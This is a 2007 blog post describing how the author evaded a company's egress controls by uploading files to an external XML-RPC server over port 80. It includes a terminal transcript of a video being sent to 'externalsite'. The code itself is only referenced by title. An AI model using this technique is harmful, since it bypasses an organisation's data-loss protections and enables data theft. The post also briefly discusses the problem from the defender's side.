«
»

Bypassing firewalls with XML-RPC

By ddsi

I know… Lots of people are talking about insecure webservices nowadays. Until recently I didn;t have much to do with it. However, I was in one quite secure environment the other week, and had to transfer my own utility I wrote outside the company. I also needed to transfer a video of the utility in-action outside.

A lot of “normal” ways of transferring data from the company were already restricted, including ssh, mail attachments, and even USB and CDROMs were locked. So, I had to really either print the source code and retype it later or come up with a way to transfer files reliably. Proxy servers did not allow access to the usual upload facilities like Rapidshare, etc. One option was to connect via port 80 somewhere and upload the file…. The company allowed only POST and GET egress. Pain in the butt… :) or …. good security…. :) unfortunately visits to my home page were prohibited by Websense under “Personal homepages” policy. Not much to do. So thinking more about it, I decided to take down my home site, and mount an XML-RPC service on port 80 instead. Tweaking things here and there, it looked promising. Here’s a client and server I wrote to finally copy binary/text files via my webservice. I based it on Twisted Python – great stuff.


dimas@moo ~/scripts/python/twisted $ ls -l ~/Desktop/video.wmv
-rw-r--r-- 1 dimas dimas 7732360 May 14 16:37 /home/dimas/Desktop/video.wmv

dimas@moo ~/scripts/python/twisted $ ./xmlrpc_client.py ~/Desktop/video.wmv ‘http://externalsite:80′
[c]Preparing for service at: http://externalsite:80
[c]Connected to http://externalsite:80
[c]Uploading file /home/dimas/Desktop/video.wmv
[c]Client digest:1a0444dff540bd641d23d28e21288804e6fd0735
[s]Server digest:1a0444dff540bd641d23d28e21288804e6fd0735
[c]File upload status: UPLD_OK

It was a success. XML-RPC calls went undetected ( or at least not prevented ). Also, if anyone visits externalsite:80 they will not see the usual upload page… which is always better :) anyways.

Here is the code. I checksum the data with sha-1, base64 -encode it on one end and reverse it on the other.

XML-RPC twisted client

XML-RPC twisted server

So, really, how are people going to fix this? Unless they do some really intelligent packet inspection and know business logic, it’s hard to do. The XML-RPC clients/servers are mostly custom within organisations, and one needs to educate the parsing software of the proper rules.

This entry was posted on June 10, 2007 at 7:43 am and is filed under Uncategorized. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Leave a Reply